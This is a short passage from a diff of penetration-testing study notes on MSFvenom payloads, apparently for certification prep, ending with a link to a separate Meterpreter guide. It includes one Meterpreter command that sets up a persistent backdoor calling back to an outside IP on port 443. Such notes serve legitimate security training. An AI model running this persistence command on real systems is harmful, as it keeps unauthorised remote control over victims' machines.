kabaneridev/pt-notes/CPTS-PREP/shells-payloads/payloads.md

 meterpreter > run persistence -X -i 10 -p 443 -r 10.10.14.113
 ```

 This comprehensive coverage of MSFvenom payload crafting provides the foundation for understanding both the technical aspects and practical applications of standalone payload generation in penetration testing scenarios.

+## Advanced Meterpreter Techniques

+For detailed post-exploitation techniques, advanced commands, and comprehensive Meterpreter usage, see the dedicated [Meterpreter Post-Exploitation Guide](meterpreter.md).